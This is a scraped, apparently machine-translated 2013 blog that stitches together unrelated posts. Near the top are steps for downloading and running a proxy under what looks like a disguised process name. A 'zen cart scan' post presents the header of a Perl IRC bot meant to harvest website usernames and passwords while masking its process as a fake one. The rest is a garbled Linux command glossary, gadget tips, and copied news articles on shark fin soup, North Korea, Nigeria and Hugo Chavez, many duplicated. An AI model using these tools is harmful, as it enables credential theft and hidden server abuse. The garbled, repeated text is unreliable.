Tuesday, March 19, 2013

install proxy server

install proxy server

The first is to prepare your server that would be used to install a proxy

prepare two proxy files, you can look it up on search engines ..

prepare yourself

okay,,, we went straight to the scene

=> Incoming server

=> Incoming directory with permision 7777

=> Wget file proxy.tgz

=> Extract files with tar-zxvf comand proxy.tgz

=> Log file directory

=> Run the comand ./xh-s. /Httpd. /Prox-a-d-p5050

=> Port 5050 is used later

=> Try testing your proxy

=> Please enjoy

Tuesday, March 12, 2013

ubuntu linux basic commands (cmd)

Here is a list of a collection of basic commands in Ubuntu Linux:
adduser = Add users to the system
addgroup = Add group to the system
alias = Create an alias
= apropos Search Help manual pages (man-k)
apt-get = Search for and install software packages (Debian)
= aspell Spell Checker
= awk Find and Replace text, database sort / validate / index
= basename Strip directory and suffix from filenames
= bash GNU Bourne-Again Shell
= bc Arbitrary precision calculator language
= bg Send to background
= break out of a loop
= builtin Run a shell builtin
= bzip2 Compress or decompress named file (s)
cal = Show calendar
case = conditionally perform a command
cat = Displays the contents of the file
cd = Change directory
cfdisk Partition table manipulator = for Linux
= chgrp Change group ownership
chmod = Change permissions
= chown Change file owner and group
chroot = Run command with a different root directory
= chkconfig System services (runlevel)
= cksum Print CRC checksum and byte count
clear = Clear screen terminal
cmp = Compare two files
comm = Compare two sorted files line by line
command = Run command - ignoring shell functions
= continue Resume the next iteration of a loop
cp = Copy one or more files to another location
= cron daemon runs the command scheduled
= crontab Schedule a command to run at a later time
csplit = Split files into the context - specified pieces
= cut splits files into several sections
date = Display or change the date & time
dc = Desk Calculator
dd = Convert and copy a file, write disk headers, boot record
ddrescue = tool to improve data
= declare Declare variables and give them attributes
df = Display disk space
diff = Display the differences between two files
= diff3 Show differences among three files
dig = DNS lookup
dir = list directory contents short
dircolors = Colour setup for `ls'
dirname = Convert all pathname to multiple paths
dirs = View list of directories to remember
= dmesg Print kernel messages & driver
du = Estimate file space usage
echo = Display message on screen
egrep = Search files for lines that match an extended expression
= eject Eject removable media
= enable Enable and disable builtin shell commands
env = Environment variables
= ethtool Ethernet card settings
eval = Evaluate several commands / arguments
exec = Run command
exit = Exit from shell
expect = automate applications accessed through terminal free
= expand Convert tabs to spaces
= Set the environment variable export
Evaluate expression expr =
false = Do not do anything, did not work
fdformat = Low-level format a floppy disk
= fdisk partition table manipulator for Linux
= fg Send job to foreground
fgrep = Search files for lines that match a fixed string
file = Specify file types
find = Search for files that meet a desired criteria
fmt = Reformat text types
= fold Wrap text to fit a specified width.
for = Expand words, and execute commands
format = Format disks or tapes
free = Show memory usage
fsck = Check and repair file system consistency
FTP = File Transfer Protocol
Define functions macro function =
fuser = Identification / disconnect process is accessing the file
= gawk Find and Replace text in a file
Outlining getopts = parameter according to the position
grep = Search files for lines that match a certain pattern
group = Print the name of the user group
= gzip Compress or decompress the file name
hash = Considering the whole pathname of a name argument
head = Output the first part of the file
help = Display help for a built-in command
The command history history =
hostname = Print or set system name
id = Print user and group id
if = perform commands conditionally
= ifconfig Configure a network interface
= ifdown Stop a network interface
ifup = Starting up network interface
import = Capturing X server screen and save the image to a file
install = Copy files and set attributes
join = join lines on a common field
Lay = kill running processes
killall = Lay off the process by name
less = Display output one screen at a time
let = Perform arithmetic on shell variables
ln = Creating relationships between files
Creating local variables =
locate = Search files
logname = Print login name
= logout Exit a login shell
= look Display lines beginning with a certain string
lpc = printer line Control Program
= lpr Off line print
lprint = Print File / Print file
lprintd = Abort a print job
lprintq = print queue list
= lprm Remove jobs from the print queue
ls = List information about file
= lsof List open files
Rebuilding make = group of program
man = manual Help
mkdir = Create a new folder
= mkfifo Make FIFOs (named pipes)
mkisofs = Create hybrid filesystem ISO9660/JOLIET/HFS
mknod = Make block or character special file
more = Display output one screen at a time
mount = Mount the file system
= mtools Manipulate MS-DOS files
mv = Move or rename a file or directory
mmv = mass Move and rename (files)
netstat = Information Network
nice = Set the priority of a command or job
nl = Number lines and write files
nohup = Run command immune to hangups
= nslookup Query Internet call server in interactive
open = open the file in the default application
op = operator access
passwd Modify a user password
paste Merge lines = file
pathchk = Check file name portability
ping = Test a network connection
pkill = terminate running processes
= popd Restore the previous value of the current directory
= pr Prepare files for printing / print
= printcap printer capability database
= printenv Print environment variables
printf Format and print data =
ps = Process Status
= pushd Save and then change the current directory
pwd = Print working directory
quota = repulse disk usage and limiting
quotacheck = Examine file system for disk usage
quotactl = Set disk quotas
= ram ram disk device
= rcp Copy files between two machines
read = Read a line from standard input
readarray = Read from stdin into an array variable
readonly = Mark variables / functions as readonly
Reboot the system reboot =
rename = Rename file
renice = Change priority of running processes
remsync = Synchronize remote files via email
return = Exit a shell function
rev = Reverse lines of a file
rm = Deleting file
rmdir = Remove folder
= rsync Remote file copy (Synchronize file trees)
= screen Multiplex terminal, run remote shells via ssh
= scp Secure copy (remote file copy)
= sdiff Merge two files interactively
= sed Stream Editor
select = Accept keyboard input
= seq Print numeric sequences
set = Manipulate shell variables and functions
= sftp Secure File Transfer Program
shift = shift positional parameters
shopt shell = Options
shutdown = Shutdown or restart linux
sleep = Delay / delay for a certain period of time
slocate = Search files
sort = Sorting text file
source = Execute commands from a file `. '
split = Split files into fixed-pieces
ssh = Secure Shell client (remote login program)
= strace Trace system calls and signals
su = Substitute user identity
sudo = Run command as another user
sum = Print a checksum for a file
symlink = Make a new name for the file
= sync Synchronize data on disk with memory
= tail Output the last part of the file
tar = Tape Archiver
= tee Redirect output to multiple files
test = Evaluate conditional expression
time = Measure Program running time
times = User and system time
touch = Change file timestamps
top = list of processes running on the system
= traceroute Trace Route to Host
= trap Run a command when a signal is set (Bourne)
tr = Translate, squeeze, and / or delete characters
= true Do nothing, successfully
tsort sort = Topology
= tty Print filename of terminal on stdin
type = describes the command
= ulimit Limit user resources (resources)
umask = The user creates a hidden file
= umount Unmount (not up) devices
= unalias Remove an alias
uname = print system information
unexpand = Convert spaces to tabs
Uniq = Uniquify file
unit = Convert units from one scale to another
= unset Remove variable or function names
= unshar Unpack shell archive records
until = Execute commands (until error)
useradd = Creating a new user account
= usermod Modify user account
users = list users currently logged in
= uuencode Encode a binary file
= uudecode Decode a file created by uuencode
v = verbosely list directory contents (`ls-l-b ')
vdir = verbosely list directory contents (`ls-lb")
vi = Text Editor
= vmstat reports virtual memory statistics
watch = Execute / display a program periodically
= wc Print byte, word and line count
whereis = Search user's $ path, man pages and source files for the program
roomates = Search user's $ path for a program file
while = Run command
who = Print all usernames currently logged in
= whoami Print the current user id and name (`id-un ')
wget = Capture web pages or files via HTTP, HTTPS or FTP
write = Send messages to other users
xargs = Execute utility, passing constructed argument list
= yes Print a string until at interrupt
. = Script run shell commands are now

How to Change Icon Blackberry

if  you want to change the icon in the following mm us his tips:

With the app Magic Icon, donlot here:


With the app Email Iconizer, donlot here:


zen cart scan

fat way to get the username password of a website.
The following is one of the boot scripts zencart.
normally used for scanning the website with the help of mirc

#  kill-9 crew                                               #
#  Indonesiancoder                                       #
#  jatimcom                                               #
#  zen cart scanner                                       #
#                                               #
# How to use:
# perl nob0dy.pl irc.server.net 6667 nick ident chan admin /usr/sbin/fakeproc
use LWP::UserAgent;
use IO::Socket;
use Socket;
use IO::Select;
use MIME::Base64;
my $datetime = localtime;

my $fakeproc  = $ARGV[6];
$ircserver = $ARGV[0] unless $ircserver;
my $ircport   = $ARGV[1];
my $nickname  = $ARGV[2];
my $ident     = $ARGV[3];
my $channel   = '#'.$ARGV[4];
my $admin     = $ARGV[5];
my $fullname  = " 9<< 4Z 8en 9>> ";

my $nob0dy    = " 9<< 4Z 8en 9>> ";
my $zenlogo   = " 9<< 4Z 8en 9>> ";
my $zencmd    = '!zen';

download full script

how can the money online

In the era of the all computers today, who does not know the internet. I'm sure most of the people of Indonesia come to know very well what it already heard of the internet although the extent of the people residing in remote and far from the reach of information about media. The last few years since the rise of social networking trend then it can not be dammed again exploit people's desire to participate. Starting from the child who knows a little bit about typing on computer keyboard letters to parents, since it started to have fun playing with social networking sites like facebook in particular.

Monday, March 11, 2013

How to Quickly Create a Website Free For Beginners

Although it has been many articles written about making Free Website For Beginners, but there are still tables that do not know, so this time Trickinfocom deliberately writes about How To Make A Website For Beginners Gratisan. Well to make it we will menggukan a provider of Web site Gratisan commonly referred to Blog, there are 10 providers that I know of anyway blog following list,
1. Blogger.com

2. WordPress.com

3. Blogsome.com

4. Multiply.com

5. Livejournal.com

6. Spaces.msn.com

7. Journalspace.com

8. my.Opera.com / community

9. 360.yahoo.com

10. weebly.com

But this time we discuss about how to create a blog from blogger.com blog providers, glance information when blogger.com is owned by champion google.Untuk how to create free website provided by others later trickinfocom jelasin scar, patient yah ..
Okay buddy Trickinfocom, just direct us how to make it well,
First, because blogger is owned by Google so that champion to create an account on blogger buddy trickinfocom must have an account on the google Gmail, already have a dong? have not had the time?, okay well maybe my friend has an account on yahoo trickinfocom time yah .. for who do not have this ya please register www.gmail.com,

English musician. After "Space Oddity"

David Bowie (born 1947) is an English musician. After "Space Oddity" reached the top five of the UK Singles Chart in 1969, he re-emerged during the glam rock era with "Starman" and the album The Rise and Fall of Ziggy Stardust and the Spiders from Mars. In 1975, Bowie achieved his first major American crossover success with the number-one single "Fame" and the album Young Americans. The soul-inspired sound was a radical shift in style that initially alienated many of his UK devotees. He then recorded the critically acclaimed "Berlin Trilogy" of albums with Brian Eno, all of which reached the UK top five. After uneven commercial success in the late 1970s, Bowie had UK number ones in the early 1980s with "Ashes to Ashes", its parent album Scary Monsters (and Super Creeps), "Under Pressure" (a collaboration with Queen) and Let's Dance, which yielded several hit singles. Throughout the 1990s and 2000s, Bowie continued to experiment with musical styles. He has not toured since the 2003–04 Reality Tour and has not performed live since 2006. Throughout his career, he has sold an estimated 140 million albums. In 2004, Rolling Stone ranked him 23rd on their list of the best singers of all time. (Full article...)

Recently featured: United States v. Lara – Dobroslav Jevđević – SR West Country and Battle of Britain classes

In Asia, tide slowly turning against shark

BANGKOK, Thailand — More auspicious than delicious, shark fin is rubbery in both taste and texture. While its flavor is muted, a bowl of shark fin soup says plenty in traditional Chinese culture: The hosts have money and they’re generous enough to spread it around.

But in Asia, the soup’s culinary home turf, the dish is increasingly regarded as, well, tasteless. Anti-finning advocates, armed with gruesome facts about threatened shark species, are attacking shark fin’s reputation as a status-boosting delicacy. Their mission: to see the culinary tradition die off before the sharks do.

“These shark fin restaurants are everywhere in Asia,” said Iris Ho, a campaign manager with Humane Society International. “But the issue has picked up speed because people more easily come into contact with shark fin soup than, say, tiger bone wine or rhino horns. Not eating it is a choice they can easily make.”

BANGKOK, Thailand — More auspicious than delicious, shark fin is rubbery in both taste and texture. While its flavor is muted, a bowl of shark fin soup says plenty in traditional Chinese culture: The hosts have money and they’re generous enough to spread it around.

But in Asia, the soup’s culinary home turf, the dish is increasingly regarded as, well, tasteless. Anti-finning advocates, armed with gruesome facts about threatened shark species, are attacking shark fin’s reputation as a status-boosting delicacy. Their mission: to see the culinary tradition die off before the sharks do.

“These shark fin restaurants are everywhere in Asia,” said Iris Ho, a campaign manager with Humane Society International. “But the issue has picked up speed because people more easily come into contact with shark fin soup than, say, tiger bone wine or rhino horns. Not eating it is a choice they can easily make.”

To many elders within China and the Chinese diaspora, a wedding without shark fin soup is like a New Year’s party without champagne. To some, the dish is so integral to business outings and big-ticket banquets that its absence suggests a snub toward guests. Even non-Chinese in Southeast Asia’s business classes have embraced the soup for its status-boosting properties.

“It’s a menu for emperors. They say it brings you luck,” said Jirayu Ekkul, coordinator of the Bangkok-based Love Wildlife Foundation. “I’ve seen plenty of weddings where, even though they’re not Chinese, they feel they have to have it.”

But the anti-finning camp is buoyed by a slew of major victories. Basketball star Yao Ming, celebrity royalty in China, has publicly urged China’s government to ban shark fin consumption. Last year, China’s Communist Party vowed to phase out shark fin soup from official functions. Taiwan, the fourth-largest shark fin market, has legally forbidden fishermen from sawing off shark fins and dumping the carcass overboard. The same rule applies to boatmen in European Union waters.

More from GlobalPost: Can Costa Rica save the sharks?

State-controlled media outlet The People’s Daily, seen as a window into Party-line thought, backed the ban and lamented the deaths of endangered sharks. Both wildlife groups and China’s own officialdom contend that 95 percent of shark fin consumption takes place in mainland China, Hong Kong and Taiwan. But Hong Kong is the true hub with more than 22 million pounds of shark fin products imported into the city each year, according to Hong Kong government figures.

Shark fin is singled as particularly destructive because fishermen often hack off sharks’ fins and wastefully chuck their carcasses into the sea. Unable to properly maneuver without fins, the sharks bleed out and sink to the ocean floor.

The latest research into endangered shark populations, recently published in the journal Marine Policy, contends that a whopping 100 million, and perhaps up to 273 million, are killed each year. At this clip, several sought-after species — the scalloped hammerhead, the porbeagle and the oceanic whitetip — may not be able to reproduce fast enough to stave off extinction.

The premier international body regulating the wildlife trade, the Convention on International Trade in Endangered Species of Wild Flora and Fauna or CITES, meets in Bangkok this month to decide whether to more tightly regulate their catch and sale.

The resistance comes from Japan, a primary catcher of sharks and China, the primary consumer. Both nations have a vote in CITES and diplomatic sway over their trading partners, said Susan Lieberman, deputy director of international policy for the Washington, DC-based Pew Charitable Trusts.

“Countries, particularly in East Asia, have not supported protection for sharks,” she said. “The science is unquestionable. If there were a land species with as much data and information as sharks, and depleted as fast as sharks, they would’ve been listed a long time ago.”

Popular sentiment on shark fin soup is difficult to gauge. But according to a 2010 survey conducted by Bloom, a nonprofit devoted to ocean preservation, three-fourths of people in major fin soup market Hong Kong would “accept a wedding banquet menu that does not include shark fin soup.” Still, the same share of respondents, roughly 75 percent, had eaten the soup in the previous 12 months.

In less-prosperous mainland China, the survey found that fewer than one in five citizens had ever eaten the soup in their entire lives. Depending on the eatery and the portion size, a serving can cost between $65 and $200.

Among shark preservationists, the consensus is that eroding the market for shark fin soup in cosmopolitan Hong Kong or Taiwan may be possible. But in increasingly prosperous China, newly rich mainlanders with an appetite for the dish could offset these gains.

“For a lot of these wildlife products, China is the biggest market,” Ho said. “That’s why it’s key to have public education campaigns. There’s so much demand.”

More from GlobalPost: Japanese turn against whaling

In Bangkok, known as a city offering shark fin soup on the cheap, Jirayu and his fellow anti-finning activists have started pressuring hotel chains to pull the soup from their menus. A confrontational name-and-shame campaign is a last resort, said Jirayu, who expects quiet cajoling to prove more effective in face-conscious Thailand.

“Older people are the ones who really want to eat shark fins,” he said. “With the elderly, it’s hard to change their minds. But with the new generation, it’s really looking good.”

But there is sometimes a social price to pay, he said, for those who swear off shark’s fin soup. “When I realize I’m invited to a wedding that serves shark fin, I have two choices. I can go but not eat it,” he said. “But that shows a lot of disrespect.”

“So I just avoid the whole wedding by saying that I’m busy,” Jirayu said. “I think other people can do the same thing.”

North Korea severed its hotline with Seoul and confirmed its decision to scrap the armistice halting the Korean War on Monday, as South Korean and US troops launched a joint military exercise.
The two sides normally speak twice a day during the week on the hotline, which has been in place since 1971.
However, Agence France-Presse quoted a spokeswoman for the South's Unification Ministry as saying:
"The North did not answer our call this morning."
Pyongyang also threatened both South Korea and the US with nuclear attack.
The threats come in the wake of new UN sanctions against Kim Jong Un’s communist regime, which followed the North's nuclear test in February.
More from GlobalPost: North Korea formally rejects UN sanctions
North Korea has severed contact with the South as many as five times, most recently in 2010, after 50 South Koreans were killed in attacks ordered by Pyongyang.
Pyongyang has condemned joint US-South Korean maneuvers as an invasion rehearsal.
The current two-week computer simulated exercise, "Key Resolve," mobilized 10,000 Korean forces and 3,500 American personnel to test various conflict scenarios on the Korean peninsula, according to Yonhap news agency.
North Korea has said that the US mainland is within striking distance of its long-range missiles, though Washington maintains defenses capable of neutralizing a North Korean ballistic attack.
Bloomberg cited cited the North's state-run Rodong Sinmun newspaper as saying that North Korea was combat ready with strategic rockets and "diversified surgical nuclear strike mechanisms."

Islamists Kill 7 Captives in Nigeria

DAKAR, Senegal — Radical Islamists in northern Nigeria have killed seven foreign construction workers who were kidnapped in February, a significant escalation of extremist violence in Nigeria’s continuing jihadist insurgency.

The killings were announced Saturday by an obscure splinter group, Ansaru, and confirmed by European foreign ministries on Sunday. The seven — an Italian, a Greek, an Englishman and four from the Middle East, including Lebanon — were seized on Feb. 16 from the compound of Setraco, a Lebanese construction company operating in Nigeria’s Bauchi State, in a well-planned nighttime assault. A grainy photo released by the group showed a gunman standing by a number of corpses.

The deaths signal a shift in tactics by the radical Islamists who have been battling the Nigerian government for nearly four years in the country’s impoverished north. The Islamist group Boko Haram has previously attacked, for the most part, officials and institutions associated with the federal and local authorities, though plenty of civilians have been killed along the way

“Overpaid and Underworked”

The Washington Post has a sympathetic article today on federal workers who consider themselves unfair victims of the sequester. Unfortunately, the article does not consider data and evidence, instead characterizing criticism of federal worker compensation as mere assertion, jealous emotionalism, or politicking.

Federal employees are upset about “perceptions” of government work, according to the people interviewed for the story. They have to defend themselves from “arguments” about excessive compensation and short working hours. They are “the target of popular rage” because the private sector is “frustrated, even jealous.” There is a “drumbeat” of negativity, “ritual denunciation,” and “bashing” of federal workers.

These sentiments supposedly come from “talk radio and websites devoted to bashing the government.” They’re driven by “a small minority of vociferous people.”

A reality check is needed here. Numerous independent analyses—including from The Heritage Foundation, the American Enterprise Institute, and the Congressional Budget Office—find that compensation for federal employees is higher than for comparable private-sector workers. The Government Accountability Office recently summarized the results of these studies


which identifies itself as "an online gathering place for independent, grass-roots conservatism on the web," is a "non-commercial, limited liability company founded and operated by Jim Robinson, a private citizen of Fresno California." [1] Free Republic's Kristinn Taylor coordinates and serves as a press contact for the pro-war lobby groups Gathering of Eagles and Move America Forward.

Although "Alliances" and "Resources" listed on the website are right-wing / conservative, the Free Republic website claims that it is "not affiliated with any political party, group, news source, government agency or anyone else." Forums include the GOP Club and RNC Caucus and do not appear to include Democratic Party links in any form. "Talk Shows" listed include such right-wing media icons as G. Gordon Liddy, Glenn Beck, Hugh Hewitt, Laura Ingraham, Rush Limbaugh, Sean Hannity, and Tony Snow. [2]

According to its website, Free Republic is "working to roll back decades of governmental largesse, to root out political fraud and corruption, and to champion causes which further conservatism in America

which identifies itself as "an online gathering place for independent, grass-roots conservatism on the web," is a "non-commercial, limited liability company founded and operated by Jim Robinson, a private citizen of Fresno California." [1] Free Republic's Kristinn Taylor coordinates and serves as a press contact for the pro-war lobby groups Gathering of Eagles and Move America Forward.

Although "Alliances" and "Resources" listed on the website are right-wing / conservative, the Free Republic website claims that it is "not affiliated with any political party, group, news source, government agency or anyone else." Forums include the GOP Club and RNC Caucus and do not appear to include Democratic Party links in any form. "Talk Shows" listed include such right-wing media icons as G. Gordon Liddy, Glenn Beck, Hugh Hewitt, Laura Ingraham, Rush Limbaugh, Sean Hannity, and Tony Snow. [2]

According to its website, Free Republic is "working to roll back decades of governmental largesse, to root out political fraud and corruption, and to champion causes which further conservatism in America

World 'needs dictators like

The minister for France's overseas territories lamented the death of Hugo Chavez on Saturday, saying the world "needs more dictators" like him after attending the late Venezuelan leader's funeral a day earlier.
Victorin Lurel described Chavez as a cross between French General Charles de Gaulle and reforming left-winger Léon Blum, who served three times as French prime minister.
“De Gaulle because he profoundly changed his country’s institutions, and Blum because he fought relentlessly against injustice,” he told RTL radio.
“I’ll be criticised for saying this, but the world needs more dictators like Hugo Chavez, if it’s a dictator that he actually was. He showed a strong respect for human rights.”
Lurel described Chavez’s funeral service as “moving”, adding that “while not everyone can agree with all his policies and actions, the people here are very proud of what he accomplished in 14 years.”
Some 32 foreign leaders and a host of celebrities attended the funeral in Cararacas on Friday at the city’s military academy.
Embalmed and on display “like Lenin”, Chavez’s body will remain on public display for a week. Officials said his body would then be placed in a glass casket and housed at the military barracks where he plotted a failed coup in 1992.
The barracks are due to be transformed into a Museum of the Bolivarian revolution.
Lurel said that while the embalming seemed to be “from another era”, he was “impressed by an operation that seemed to "genuinely sanctify” Chavez.

World 'needs dictators like Chavez' says French minister

The minister for France's overseas territories lamented the death of Hugo Chavez on Saturday, saying the world "needs more dictators" like him after attending the late Venezuelan leader's funeral a day earlier.
Victorin Lurel described Chavez as a cross between French General Charles de Gaulle and reforming left-winger Léon Blum, who served three times as French prime minister.
“De Gaulle because he profoundly changed his country’s institutions, and Blum because he fought relentlessly against injustice,” he told RTL radio.
“I’ll be criticised for saying this, but the world needs more dictators like Hugo Chavez, if it’s a dictator that he actually was. He showed a strong respect for human rights.”
Lurel described Chavez’s funeral service as “moving”, adding that “while not everyone can agree with all his policies and actions, the people here are very proud of what he accomplished in 14 years.”
Some 32 foreign leaders and a host of celebrities attended the funeral in Cararacas on Friday at the city’s military academy.
Embalmed and on display “like Lenin”, Chavez’s body will remain on public display for a week. Officials said his body would then be placed in a glass casket and housed at the military barracks where he plotted a failed coup in 1992.
The barracks are due to be transformed into a Museum of the Bolivarian revolution.
Lurel said that while the embalming seemed to be “from another era”, he was “impressed by an operation that seemed to "genuinely sanctify” Chavez.

The minister for France's overseas territories lamented the death of Hugo Chavez on Saturday, saying the world "needs more dictators" like him after attending the late Venezuelan leader's funeral a day earlier.
Victorin Lurel described Chavez as a cross between French General Charles de Gaulle and reforming left-winger Léon Blum, who served three times as French prime minister.
“De Gaulle because he profoundly changed his country’s institutions, and Blum because he fought relentlessly against injustice,” he told RTL radio.
“I’ll be criticised for saying this, but the world needs more dictators like Hugo Chavez, if it’s a dictator that he actually was. He showed a strong respect for human rights.”
Lurel described Chavez’s funeral service as “moving”, adding that “while not everyone can agree with all his policies and actions, the people here are very proud of what he accomplished in 14 years.”
Some 32 foreign leaders and a host of celebrities attended the funeral in Cararacas on Friday at the city’s military academy.
Embalmed and on display “like Lenin”, Chavez’s body will remain on public display for a week. Officials said his body would then be placed in a glass casket and housed at the military barracks where he plotted a failed coup in 1992.
The barracks are due to be transformed into a Museum of the Bolivarian revolution.
Lurel said that while the embalming seemed to be “from another era”, he was “impressed by an operation that seemed to "genuinely sanctify” Chavez.